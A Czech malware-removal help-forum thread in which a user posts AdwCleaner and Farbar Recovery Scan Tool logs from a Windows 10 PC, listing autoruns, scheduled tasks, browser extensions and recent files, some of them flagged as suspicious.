No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 17:58
od Rudy
Dejte nové logy FRST+Addition.

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 18:50
od chenny
FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 18:40:54)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 18:41 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 18:41 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
